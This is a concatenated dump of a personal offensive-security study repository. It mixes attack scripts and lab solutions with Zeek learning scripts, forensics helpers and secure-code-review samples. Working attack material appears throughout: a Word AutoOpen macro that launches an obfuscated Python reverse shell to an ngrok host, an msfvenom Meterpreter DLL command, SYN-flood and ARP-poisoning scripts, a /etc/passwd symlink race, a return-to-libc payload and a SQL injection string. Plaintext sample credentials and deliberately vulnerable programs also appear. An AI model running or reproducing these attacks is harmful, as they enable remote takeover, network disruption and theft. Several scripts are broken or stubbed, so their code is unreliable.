17:12:48.84606999 -0500 EST m=+41.323786139, Username: administrator, Password: P@ssword12345 3 | Time: 2021-01-09 17:17:55.684737939 -0500 EST m=+27.686224982, Username: admin, Password: super secure password 4 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "czqSwiRCs1sNZ1eAMskTu6OimH7hDiz+VPPupLRBkxiXq2GijNpfHgYwY680bXh5CwjnpZkZSOZGRHT5t412bw==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\rodri\\Documents\\Cryptography\\SymmetricEncryption\\CSharpAES\\CSharpAES.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /Misc/fail_safe_openvpn.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | #### Run 4 | # openvpn --script-security 2 --down fail_safe_openvpn.sh --config [OPENVPN_CONFIG_FILE] 5 | 6 | echo '==> disabling network...' 7 | systemctl stop network-manager 8 | killall -9 dhclient 9 | 10 | for i in $(ifconfig | grep -Eio '^[a-z0-9]+:' | grep -v '^lo:$' | cut -d':' -f1) 11 | do 12 | ifconfig $i 0.0.0.0 down 13 | done 14 | -------------------------------------------------------------------------------- /MicrosoftAttacks/readme.md: -------------------------------------------------------------------------------- 1 | # Microsoft Attacks 2 | 3 | ### Execute Malicious DLL with Rundll32 4 | - Generate shared library (DLL) with Metasploit 5 | ```console 6 | msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll 7 | ``` 8 | - Execute the malicious DLL with rundll32 9 | ```console 10 | rundll32.exe shell32.dll,Control_RunDLL payload.dll 11 | ``` 12 | -------------------------------------------------------------------------------- /Misc/Caddy/readme.md: -------------------------------------------------------------------------------- 1 | # Caddy Server Stuff 2 | 3 | ### Installing Web Dav Module 4 | 5 | 1. Download and install Caddy 6 | 2. Install third-party module, Run `sudo caddy add-package github.com/mholt/caddy-webdav` 7 | 3. Confirm module was installed with `caddy list-modules | grep webdav` 8 | 9 | ![image](https://user-images.githubusercontent.com/44281620/151255555-82c5aa24-b5b8-481f-a455-6fbd12191e8c.png) 10 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/vectors.zeek: -------------------------------------------------------------------------------- 1 | event zeek_init() 2 | { 3 | local v: vector of string = {"v1", "v2", "v3"}; 4 | 5 | # print first element of vector 6 | print v[0]; 7 | 8 | # append value to the end of vector using length operator "||" 9 | v[|v|] = "v4"; 10 | 11 | # print all elements of vector 12 | for (e in v) 13 | { 14 | print e 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /Cryptography/Cryptopals/bases_test.py: -------------------------------------------------------------------------------- 1 | from bases import Bases 2 | 3 | if __name__ == "__main__": 4 | base = Bases() 5 | b64_encode = base.to_b64 6 | b64_decode = base.from_b64 7 | 8 | inp = b"ABCDEFGHIJ" 9 | out = "QUJDREVGR0hJSg==" 10 | assert b64_encode(inp) == out, "invalid base64 encoding" 11 | 12 | inp = b"QUJDREVGR0hJSg==" 13 | out = "ABCDEFGHIJ" 14 | assert b64_decode(inp) == out, "invalid base64 decoding" 15 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.1.js.solution.txt: -------------------------------------------------------------------------------- 1 | The `sample.1.js` code does not have any vulnerabilities. One might think there is an account take over in the code due to the use of the `findOne` method which performing a lowercase lookup even though the `toLowerCase` method is being invoked against the email before registering the account. However, what actually happens is that an account with the same email will be created. 2 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/sets.zeek: -------------------------------------------------------------------------------- 1 | event zeek_init() 2 | { 3 | local s: set[string] = {"one", "two", "three"}; 4 | # adding element to set 5 | add s["four"]; 6 | 7 | # deleting element from set 8 | delete s["two"]; 9 | 10 | # checking membership of element in set 11 | print "one" in s; 12 | 13 | # printing all elements in set 14 | for (w in s) 15 | { 16 | print w; 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /Defense/Forensics/Go/README.md: -------------------------------------------------------------------------------- 1 | # Resources 2 | 3 | - Dollar I File Structure 4 | - [DollarI](https://df-stream.com/2016/04/fun-with-recycle-bin-i-files-windows-10) 5 | - Run and RunOnce Registry Keys 6 | - [Run-RunOnce-Keys](https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys) 7 | - For Parsing LNK Files 8 | - [LNK-Files](https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/%5BMS-SHLLINK%5D-160714.pdf) 9 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab1/README.md: -------------------------------------------------------------------------------- 1 | # Retrieving Hidden Data 2 | 3 | ### Objective 4 | 5 | - Retrieve all products from the backend database, including unreleased products 6 | 7 | ### Solution 8 | 9 | The `categories` query parameter is vulnerable to a basic SQL Injection vulnerability. The solution is to this is: 10 | 11 | ``` 12 | https://.web-security-academy.net/products?catagories=Accessories' or 1=1-- - 13 | ``` 14 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/events.zeek: -------------------------------------------------------------------------------- 1 | global myevent: event(s: string); 2 | 3 | global n = 0; 4 | 5 | event myevent(s: string) &priority = -10 6 | { 7 | ++n; 8 | } 9 | 10 | event myevent(s: string) &priority = 10 11 | { 12 | print "myevent", s, n; 13 | } 14 | 15 | event zeek_init() 16 | { 17 | print "zeek_init()"; 18 | event myevent("hi"); 19 | schedule 5 sec { myevent("bye") }; 20 | } 21 | 22 | event zeek_done() 23 | { 24 | print "zeek_done()"; 25 | } 26 | -------------------------------------------------------------------------------- /Defense/StoredProcedures/app.sql: -------------------------------------------------------------------------------- 1 | CREATE DATABASE app; 2 | 3 | USE app; 4 | 5 | CREATE TABLE Users ( 6 | username VARCHAR(35), 7 | email VARCHAR(35), 8 | password VARCHAR(50) 9 | ); 10 | 11 | INSERT INTO Users 12 | VALUES 13 | ("james", "james@gmail.com", "password"), 14 | ("mike", "mike@proton.com", "mikeisawesome"), 15 | ("joker", "joker@batman.com", "jokerjoker123"), 16 | ("ashley", "ashley@yahoo.com", "1234567abc"), 17 | ("Daphne", "daph@gmail.com", "d@phne123abc"); 18 | -------------------------------------------------------------------------------- /SecureCodeReview/container-attack-surface-minimization/secure-go-build-example.dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.15 as build 2 | 3 | COPY . . 4 | 5 | ENV GOPATH="" 6 | ENV CGO_ENABLED=0 7 | ENV GOOS=linux 8 | ENV GOARCH=amd64 9 | RUN go build -trimpath -v -a -o myapp -ldflags="-w -s" 10 | RUN chmod +x go-goof 11 | 12 | RUN useradd -u 12345 moby 13 | 14 | FROM scratch 15 | COPY --from=build /go/myapp /myapp 16 | COPY --from=build /etc/passwd /etc/passwd 17 | USER moby 18 | 19 | ENTRYPOINT ["/myapp"] 20 | -------------------------------------------------------------------------------- /SecureCodeReview/go/xss/basic-xss.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | // http://127.0.0.1:8080/?arg= 4 | 5 | import ( 6 | "fmt" 7 | "io" 8 | "net/http" 9 | ) 10 | 11 | func handler(w http.ResponseWriter, r *http.Request) { 12 | io.WriteString(w, r.URL.Query().Get("arg")) 13 | } 14 | 15 | func main() { 16 | http.HandleFunc("/", handler) 17 | fmt.Println("listening on :8080 ...") 18 | http.ListenAndServe(":8080", nil) 19 | } 20 | -------------------------------------------------------------------------------- /NSE/template.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- @usage 3 | -- 4 | -- @output 5 | -- 6 | -- @args 7 | -- 8 | --- 9 | 10 | description = [[ 11 | ]] 12 | 13 | author = "" 14 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 15 | categories = {} 16 | 17 | -- performs check against host 18 | function hostrule(host) 19 | end 20 | 21 | -- performs check against port 22 | function portrule(host, port) 23 | end 24 | 25 | -- performs the actual enumeration or exploit 26 | function action(host, port) 27 | end 28 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/getenvaddr.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(int argc, char *argv[]) 6 | { 7 | char *ptr; 8 | if(argc < 3) 9 | { 10 | printf("Usage: %s ", argv[0]); 11 | exit(0); 12 | } 13 | ptr=getenv(argv[1]); 14 | printf("Unshifted mem addr: %p\n", ptr); 15 | ptr+=(strlen(argv[0]) - strlen(argv[2]))*2; 16 | printf("%s will be at %p\n", argv[1], ptr); 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /Misc/TCPAttacks/SynFloodingAttack/tcp_syn_flooding.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from scapy.all import IP, TCP, send 4 | from ipaddress import IPv4Address 5 | from random import getrandbits 6 | 7 | def tcp_syn_flood(): 8 | ip = IP(dst="target_ip") 9 | tcp = TCP(sport=4444, dport=443, seq=4444, flags='S') 10 | pkt = ip/tcp 11 | 12 | while True: 13 | pkt["IP"].src = str(IPv4Address(genranbits(32))) 14 | send(pkt, verbose=0) 15 | 16 | if __name__ == "__main__": 17 | tcp_syn_flood() 18 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/simple_server.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | func hello(w http.ResponseWriter, r *http.Request) { 9 | // Writing query supplied data into ``http.ResponseWriter`` 10 | // which is an ``io.Writer`` 11 | fname := r.URL.Query().Get("fname") 12 | lname := r.URL.Query().Get("lname") 13 | fmt.Fprintf(w, "Hello, %s %s!", fname, lname) 14 | } 15 | 16 | func main() { 17 | http.HandleFunc("/hello", hello) 18 | http.ListenAndServe("127.0.0.1:8080", nil) 19 | } 20 | -------------------------------------------------------------------------------- /Burp/Bambdas/filterOutImages.java: -------------------------------------------------------------------------------- 1 | if (!requestResponse.hasResponse()) return false; 2 | 3 | HttpRequest request = requestResponse.request(); 4 | Matcher matcher = Pattern 5 | .compile("portswigger\\.net") 6 | .matcher(request.url()); 7 | 8 | return matcher.find() && 9 | request.hasHeader("cookie") && 10 | !request.path().matches(".*(\\.(png|svg|jpg|tiff|webp|ico|woff2?))"); 11 | 12 | // FOR IN SCOPE ITEMS 13 | //return request.isInScope() && 14 | // !request.path().matches(".*(\\.(png|svg|jpg|tiff|webp|ico|woff2?))"); 15 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/hacking.h: -------------------------------------------------------------------------------- 1 | // A function to display an error message and then exit 2 | void fatal(char *message) { 3 | char error_message[100]; 4 | strcpy(error_message, "[!!] Fatal Error "); 5 | strncat(error_message, message, 83); 6 | perror(error_message); 7 | exit(-1); 8 | } 9 | // An error-checked malloc() wrapper function 10 | void *ec_malloc(unsigned int size) { 11 | void *ptr; 12 | ptr = malloc(size); 13 | if(ptr == NULL) 14 | fatal("in ec_malloc() on memory allocation"); 15 | return ptr; 16 | } 17 | -------------------------------------------------------------------------------- /Phishing/Gophish/nacl.tf: -------------------------------------------------------------------------------- 1 | resource "aws_default_network_acl" "default" { 2 | default_network_acl_id = "${aws_vpc.gophish_vpc.default_network_acl_id}" 3 | 4 | ingress { 5 | protocol = -1 6 | rule_no = 100 7 | action = "allow" 8 | cidr_block = "0.0.0.0/0" 9 | from_port = 0 10 | to_port = 0 11 | } 12 | 13 | egress { 14 | protocol = -1 15 | rule_no = 100 16 | action = "allow" 17 | cidr_block = "0.0.0.0/0" 18 | from_port = 0 19 | to_port = 0 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /AntivirusEvasion/RemoteProcessAttacks/ProcessHallowing/Python/process_hallow.py: -------------------------------------------------------------------------------- 1 | from sys import exit 2 | 3 | from ctypes import windll 4 | from ctypes import POINTER as Pointer 5 | 6 | 7 | class SecurityAttributes(Structure): 8 | _fields_ = [ 9 | ('nLength', DWORD), 10 | ('lpSecurityDescriptor', LPVOID), 11 | ('bInheritHandle', BOOL), 12 | ] 13 | 14 | 15 | class ProcessHallow: 16 | def __init__(self): 17 | pass 18 | 19 | def __enter__(self): 20 | pass 21 | 22 | def __exit__(self): 23 | pass 24 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Misc/random_nums.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() 6 | { 7 | int i; 8 | printf("RAND_MAX = %u\n", RAND_MAX); 9 | srand(time(0)); 10 | 11 | printf("Random values from 0 to RAND_MAX\n"); 12 | for(i=0; i<8; i++) 13 | { 14 | printf("%d\n", rand()); 15 | } 16 | printf("Random values from 0 to 10\n"); 17 | for(i=0; i<8; i++) 18 | { 19 | printf("%d\n", (rand()%10)+1); 20 | } 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /Misc/ReturnToLibc/attack_code.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | if __name__ == "__main__": 4 | payload = bytearray(0xaa for i in range(517)) 5 | 6 | bash_addr = 0xbffffdf1 7 | payload[44:48] = (bash_addr).to_bytes(4, byteorder="little") 8 | 9 | exit_addr = 0xb7e369d0 10 | payload[40:44] = (exit_addr).to_bytes(4, byteorder="little") 11 | 12 | system_addr = 0xb7e42da0 13 | payload[36:40] = (system_addr).to_bytes(4, byteorder="little") 14 | 15 | with open("malicious_file", "wb") as f: 16 | f.write(payload) 17 | -------------------------------------------------------------------------------- /DockerStuff/C2Deployments/nginx/main.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 443 http2 ssl default_server; 3 | root /var/www/html; 4 | index "index.html"; 5 | 6 | ssl_certificate "/etc/ssl/certs/nginx.crt"; 7 | ssl_certificate_key "/etc/ssl/private/nginx.key"; 8 | 9 | location / { 10 | try_files $uri $uri/ =404; 11 | } 12 | 13 | location /msf_endpoint { 14 | proxy_pass "https://localhost:8443"; 15 | proxy_ssl_verify off; 16 | proxy_set_header Host $host; 17 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Misc/RaceConditions/attackingProgram.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // sudo sysctl -w fs.protected_symlinks=0 6 | int main() 7 | { 8 | unsigned int flags = RENAME_EXCHANGE; 9 | 10 | unlink("/tmp/X"); 11 | symlink("/dev/null", "/tmp/X"); 12 | 13 | unlink("/tmp/A"); 14 | symlink("/etc/passwd", "/tmp/A"); 15 | 16 | while(1) 17 | { 18 | syscall(SYS_renameat2, 0, "/tmp/X", 0, "/tmp/A", flags); 19 | usleep(1000); 20 | } 21 | 22 | return 0; 23 | } 24 | 25 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/records.zeek: -------------------------------------------------------------------------------- 1 | type Person: record { 2 | fname: string; 3 | lname: string; 4 | age: int; 5 | is_student: bool &default = T; 6 | is_married: bool &optional; 7 | }; 8 | 9 | event zeek_init() 10 | { 11 | local p = Person( 12 | $fname="John", 13 | $lname="Wick", 14 | $age=40, 15 | $is_student=F); 16 | 17 | # checking if value is set 18 | if ( p?$fname ) 19 | { 20 | print fmt("Name: %s", p$fname); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /PhysicalPentestStuff/rubberDucky/scripts/get-wifi-password.txt: -------------------------------------------------------------------------------- 1 | REM ------------------------------------------------ 2 | REM This ducky script will show the password of the 3 | REM WI-FI on the machine that the ducky is plugged 4 | REM into. Tool used: netsh. 5 | REM ------------------------------------------------ 6 | 7 | REM Open run window 8 | GUI r 9 | REM Delay 1s 10 | DELAY 1000 11 | REM Press enter 12 | ENTER 13 | REM Delay 1s 14 | DELAY 1000 15 | REM Execute command to show password 16 | STRING netsh wlan show profile name="SSID GOES HERE!" key=clear 17 | REM End 18 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "CSharpAES/1.0.0": { 10 | "runtime": { 11 | "CSharpAES.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "CSharpAES/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /Defense/Zeek/Learning/tables.zeek: -------------------------------------------------------------------------------- 1 | event zeek_init() 2 | { 3 | local t: table[count] of string = { 4 | [1] = "value1", 5 | [2] = "value2", 6 | [3] = "value3"}; 7 | 8 | # adding elements to table 9 | t[4] = "value4"; 10 | 11 | # testing membership 12 | print "value4" in t; 13 | 14 | # deleting element from table 15 | delete t[1]; 16 | 17 | # altering value for a table key 18 | t[2] = "val2"; 19 | 20 | # print keys of a table 21 | for (k in t) 22 | { 23 | print k 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /Misc/RaceConditions/vulnerableRaceConditionProgram.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() 6 | { 7 | char *fn = "/tmp/X"; 8 | char buffer[60]; 9 | FILE *fp; 10 | 11 | scanf("%50s", buffer); 12 | 13 | if(!access(fn, W_OK)) 14 | { 15 | fp = fopen(fn, "a+"); 16 | fwrite("\n", sizeof(char), 1, fp); 17 | fwrite(buffer, sizeof(char), strlen(buffer), fp); 18 | fclose(fp); 19 | } 20 | else 21 | printf("No permission\n"); 22 | 23 | return 0; 24 | } 25 | 26 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/utils/autocompleter.py: -------------------------------------------------------------------------------- 1 | commands = ( 2 | "campaigns", "groups", "templates", 3 | "pages", "profiles", "help", "exit", 4 | "cls", "clear", "edit", "create", 5 | "get", "delete", "info", "set", "back", 6 | 7 | "name", "host", "email_address", "ignore_cert_errors" 8 | ) 9 | 10 | def auto_complete(text, state): 11 | options = [command 12 | for command in commands if command.startswith(text) 13 | ] 14 | try: 15 | return options[state] 16 | except IndexError: 17 | return None 18 | 19 | -------------------------------------------------------------------------------- /MicrosoftAttacks/Word/python_reverse_shell_macro.txt: -------------------------------------------------------------------------------- 1 | Sub AutoOpen() 2 | Shell ("python -c ""exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzAudGNwLm5ncm9rLmlvJywxOTAwOSkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]))""") 3 | End Sub 4 | -------------------------------------------------------------------------------- /Phishing/Gophish/variables.tf: -------------------------------------------------------------------------------- 1 | variable "vpc_cidr" { 2 | description = "CIDR block for VPC" 3 | default = "10.100.0.0/16" 4 | } 5 | 6 | variable "public_subnet_cidr" { 7 | description = "CIDR block for public subnet" 8 | default = "10.100.10.0/24" 9 | } 10 | 11 | variable "az" { 12 | description = "Availability zone" 13 | default = "us-east-1a" 14 | } 15 | 16 | variable "ami" { 17 | description = "Amazon Linux 2 AMI" 18 | default = "ami-087c17d1fe0178315" 19 | } 20 | 21 | variable "instance_type" { 22 | description = "EC2 instance type" 23 | default = "t2.micro" 24 | } 25 | -------------------------------------------------------------------------------- /Misc/AttacksOnSUIDAndEnvVariables/AttacksViaUserInput.c: -------------------------------------------------------------------------------- 1 | // An intentionally vulnerable program for showing demonstrating 2 | // attacks on SUID programs via explicit user input 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | int main(int argc, char *argv[]) { 9 | char *cat = "/bin/cat"; 10 | if (argc < 2) { 11 | printf("Please type a file name.\n"); 12 | return 1; 13 | } 14 | 15 | char *command = malloc(strlen(cath) + strlen(argv[1] + 2); 16 | sprintf(command, "%s %s", cat, argv[1]); 17 | system(command); 18 | 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.3.java: -------------------------------------------------------------------------------- 1 | /* Can you spot the vulnerability?? */ 2 | 3 | public Document parseXMLInput(String xml) throws ParsingException, IOException { 4 | return new Document(xml); // `Document` defined below 5 | } 6 | 7 | /* Document definition */ 8 | public Document(String xml) throws ParsingException, IOException { 9 | SAXBuilder sax = initializeSAXBuilder(); 10 | 11 | try { 12 | this.jdomDocument = sax.build(new StringReader(xml)); 13 | initializeStringOutputter(); 14 | } catch (JDOMException e) { 15 | throw new ParsingException(e); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /Burp/CustomActions/CheckForCRLFHeaderInjection.java: -------------------------------------------------------------------------------- 1 | var request = requestResponse.request(); 2 | var userAgent = request.headerValue("User-Agent"); 3 | var userAgentWithCrlfSuffix = String.format("%s%s", userAgent, "%0d%0aCRLF-Header: 1337"); 4 | var modifiedRequest = request.withRemovedHeader("User-Agent").withAddedHeader("User-Agent", userAgentWithCrlfSuffix); 5 | var resp = api().http().sendRequest(modifiedRequest).response(); 6 | resp.headers().forEach(header -> { 7 | if (header.name().equals("CRLF-Header")) { 8 | logging.logToOutput("[+] CRLF payload has been returned as a header!!!"); 9 | } 10 | }); -------------------------------------------------------------------------------- /HackingVMs/blackarch.md: -------------------------------------------------------------------------------- 1 | # Blackarch 2 | 3 | ### Update Blackarch 4 | 5 | ```console 6 | sudo pacman -Syu --needed --overwrite='*' blackarch 7 | ``` 8 | 9 | ### Update specific package 10 | 11 | ```console 12 | sudo pacman -S --noconfirm 13 | ``` 14 | 15 | ### Install/Enable VMware tools 16 | 17 | 1. Fixes VM resolution to match host 18 | 2. Allow for copy/paste between guest and host 19 | 3. Improves device performances 20 | 21 | ```console 22 | sudo pacman -S archlinux-keyring open-vm-tools glibc lib32-glibc --noconfirm 23 | sudo systemctl enable vmtoolsd 24 | sudo systemctl start vmtoolsd 25 | ``` 26 | -------------------------------------------------------------------------------- /Misc/DNSAttacks/google_redirect.py: -------------------------------------------------------------------------------- 1 | from socket import socket, AF_INET, SOCK_DGRAM 2 | 3 | def start_dns_server(IP: str, PORT: int): 4 | with socket(AF_INET, SOCK_DGRAM) as s: 5 | print("[++] Starting DNS server ...") 6 | s.bind((IP, PORT)) 7 | 8 | while True: 9 | data, conn = s.recvfrom(512) 10 | parse_dns_req_header(data) 11 | 12 | def parse_dns_req_header(req: bytes): 13 | id_ = "".join([hex(v)[2:] for v in req[:2]]) 14 | print(id_) 15 | 16 | if __name__ == "__main__": 17 | start_dns_server("127.0.0.1", 53) 18 | 19 | -------------------------------------------------------------------------------- /Misc/ARPAttacks/arp_cache_poisoning.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from scapy.all import * 3 | from time import sleep 4 | 5 | TARGET_IP = "192.168.33.143" 6 | TARGET_MAC = "00:0c:29:8a:fd:22" 7 | FAKE_IP = "11.22.33.44" 8 | FAKE_MAC = "aa:bb:cc:dd:ee:ff" 9 | 10 | 11 | if __name__ == "__main__": 12 | frame = Ether() 13 | frame.src = FAKE_MAC 14 | frame.dst = TARGET_MAC 15 | 16 | arp = ARP() 17 | arp.hwsrc = FAKE_MAC 18 | arp.psrc = FAKE_IP 19 | arp.pdst = TARGET_IP 20 | arp.op = 1 21 | 22 | packet = frame/arp 23 | while True: 24 | sendp(packet) 25 | sleep(5) 26 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Misc/time_ex.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() 5 | { 6 | long int seconds_since_epoch; 7 | struct tm curr_time, *time_ptr; 8 | int hr, min, sec, day, mon, yr; 9 | 10 | seconds_since_epoch = time(0); 11 | printf("Seconds since epoch: %ld\n", seconds_since_epoch); 12 | 13 | time_ptr = &curr_time; 14 | localtime_r(&seconds_since_epoch, time_ptr); 15 | 16 | hr = curr_time.tm_hour; 17 | min = time_ptr->tm_min; 18 | sec = *((int*)time_ptr); 19 | 20 | printf("Current time: %02d:%02d:%02d\n", hr, min, sec); 21 | } 22 | -------------------------------------------------------------------------------- /Misc/crawler.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | def request(url): 5 | try: 6 | return requests.get("http://" + url) 7 | except requests.exceptions.ConnectionError: 8 | pass 9 | except requests.exceptions.InvalidURL: 10 | pass 11 | 12 | target_url = input("Enter a URL: ") 13 | 14 | with open("files-and-dirs-wordlist.txt", "r") as wordlist_file: 15 | for word in wordlist_file: 16 | word = word.strip("\n") 17 | url = target_url + "/" + word 18 | response = request(url) 19 | if response: 20 | print("[+] discovered subdomain --> " + url) 21 | -------------------------------------------------------------------------------- /DockerStuff/VulnerableDeployments/CVE-2021-3156/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:lastest 2 | 3 | ARG DEBIAN_FRONTEND=noninteractive 4 | 5 | RUN apt update && apt -y install \ 6 | gcc make wget curl git vim gdb bsdmainutils 7 | 8 | RUN cd /tmp && wget https://www.sudo.ws/dist/sudo-1.8.31.tar.gz \ 9 | && tar xvzf sudo-1.8.31.tar.gz && cd sudo-1.8.31\ 10 | && export CFLAGS="-ggdb" && ./configure && make && make install 11 | 12 | RUN useradd -m -s /bin/bash -d /home/user user 13 | 14 | WORKDIR /home/user 15 | 16 | RUN git clone https://github.com/CptGibbon/CVE-2021-3156 /home/user/cve-2021-3156 17 | 18 | USER user 19 | 20 | 21 | -------------------------------------------------------------------------------- /Defense/NIST_800_171_COMPLIANT/clamav-download-scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | DIR="$HOME/Downloads" 3 | 4 | if [ -f "$HOME/virus-scan.log" ] 5 | then 6 | rm ${HOME}/virus-scan.log 7 | fi 8 | 9 | IFS=$(echo -en "\n\b") 10 | 11 | shopt -s lastpipe 12 | inotifywait --quiet --monitor --event create --recursive --format '%w%f' $DIR | while read FILE 13 | sleep 1s 14 | do 15 | if [ -s $FILE ]; then 16 | date > $HOME/virus-scan.log 17 | clamdscan --move=$HOME/virus-quarantine $FILE >> $HOME/virus-scan.log 18 | kdialog --title "Virus scan of $FILE" --msgbox "$(cat $HOME/virus-scan.log)" 19 | fi 20 | done 21 | -------------------------------------------------------------------------------- /DockerStuff/MalwareAnalysis/cyberchef.dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:latest 2 | 3 | ENV GOPATH /go 4 | RUN mkdir /go $GOPATH/{bin,src} 5 | ENV PATH $GOPATH/bin:$PATH 6 | 7 | WORKDIR /app 8 | 9 | RUN apk add --no-cache --update git nodejs npm go 10 | RUN npm install -g grunt-cli 11 | RUN git clone https://github.com/gchq/CyberChef.git cyberchef 12 | 13 | WORKDIR /app/cyberchef 14 | 15 | RUN npm install 16 | RUN go install -v github.com/projectdiscovery/simplehttpserver/cmd/simplehttpserver@latest 17 | RUN grunt prod 18 | 19 | WORKDIR /app/cyberchef/build/prod 20 | 21 | CMD [ "simplehttpserver", "-listen", ":8000", "-https"] 22 | 23 | -------------------------------------------------------------------------------- /Defense/StoredProcedures/stored_procedure.py: -------------------------------------------------------------------------------- 1 | from mysql.connector import connect 2 | from os import environ 3 | 4 | def get_email_addr(cursor, stored_proc_name, *stored_proc_args): 5 | result = cursor.callproc(stored_proc_name, [*stored_proc_args]) 6 | email = result[2] 7 | print(email) 8 | 9 | if __name__ == "__main__": 10 | from sys import argv 11 | username = argv[1] 12 | password = argv[2] 13 | 14 | mydb = connect( 15 | host="localhost", 16 | user="root", 17 | password=environ["MYSQL_PASS"], 18 | database="app") 19 | 20 | cursor = mydb.cursor() 21 | get_email_addr(cursor, "get_email_addr", username, password, None) -------------------------------------------------------------------------------- /Misc/url_download.py: -------------------------------------------------------------------------------- 1 | from requests import get 2 | from sys import argv, exit 3 | 4 | def download(source): 5 | response = get(source) 6 | print(f"[+] Getting {source} data") 7 | if response.status_code == 200: 8 | source_file_name = source.split("/")[-1] 9 | with open(source_file_name, "wb") as opened_file: 10 | opened_file.write(response.content) 11 | print(f"[+] Successfully downloaded {source}") 12 | 13 | if __name__ == "__main__": 14 | if len(argv) < 1: 15 | print(f"Usage: {argv[0]} ") 16 | exit(1) 17 | source = argv[1].rstrip("/") 18 | download(source) 19 | -------------------------------------------------------------------------------- /Defense/Forensics/Python/TheRegistry/enumerate_windows_version.py: -------------------------------------------------------------------------------- 1 | from winreg import ( 2 | ConnectRegistry, 3 | OpenKey, 4 | KEY_ALL_ACCESS, 5 | EnumValue, 6 | QueryInfoKey, 7 | HKEY_LOCAL_MACHINE, 8 | HKEY_CURRENT_USER 9 | ) 10 | if __name__ == "__main__": 11 | with ConnectRegistry(None, HKEY_LOCAL_MACHINE) as hive: 12 | with OpenKey(hive, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion", 0, KEY_ALL_ACCESS) as hosts_key: 13 | num_of_values = QueryInfoKey(hosts_key)[1] 14 | for i in range(num_of_values): 15 | values = EnumValue(hosts_key, i) 16 | print(values) 17 | -------------------------------------------------------------------------------- /NucleiTemplates/aws-key-extractor.yaml: -------------------------------------------------------------------------------- 1 | id: aws-key-extractor 2 | 3 | info: 4 | name: AWS Key Extractor 5 | author: 